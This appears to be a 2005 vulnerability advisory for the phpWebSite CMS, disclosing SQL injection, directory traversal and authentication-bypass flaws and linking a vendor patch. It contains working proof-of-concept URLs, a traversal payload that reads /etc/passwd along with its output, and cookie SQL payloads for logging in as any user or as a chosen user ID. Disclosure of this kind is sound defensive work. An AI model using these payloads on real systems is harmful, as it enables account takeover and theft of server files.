|
HSC Research Group -
Advisories
|
|
Written by Hackers Center
|
|
Wednesday, 06 July 2005 16:19 |
 Dcrab "s Security Advisory
http://www.dbtech.org
Deadbolt Computer Technologies
Get Dcrab"s Services to audit your Web servers, scripts, networks, etc or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Phpwebsite has multiple serious vulnerabilities
Date: 7/07/2005
Vendor: Phpwebsite
Vendor Website: http://phpwebsite.appstate.edu
Vendor Status: Contacted and patch has been released
Summary: There are, multiple sql injection, authentication bypass and directory transversal vulnerabilities in Phpwebsite.
Proof of Concept Exploits:
www.example.com/phpwebsite/index.php?module="&search_op=search&mod=all&query=1&search=Search
SQL injection
DB Error: syntax error
SELECT show_block, block_title FROM mod_search WHERE module=""" [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near """"" at line 1]
www.example.com/phpwebsite/index.php?module=search&search_op=search&mod="&query=1&search=Search
SQL injection
DB Error: syntax error
SELECT block_title FROM mod_search WHERE module=""" [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near """"" at line 1]
www.example.com/phpwebsite/index.php?module=search&search_op=search&mod=../../../../../../../../etc/passwd%00&query=1&search=Search
Directory traversal
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false news:x:9:13:News
Log into a user account with remember me checked, then delete all the cookies beside the one with [mod_users][rememberme]
Cookie name: *an md5 hash set by the website* [mod_users][rememberme]
Value: a" or "a" = "a
You can also steal specific user accounts by setting the cookie value as a" or user_id = "5"
Solution:
The vendor"s were contacted via email and responded quickly. The issue was corresponded to them after which a patch was released on their official website.
You can get the security patch at, http://phpwebsite.appstate.edu/downloads/security/phpwebsite_security_patch_20050705.2.tgz
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah and at http://www.hackerscenter.com
Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my soon to come out book on Secure coding with php.
|
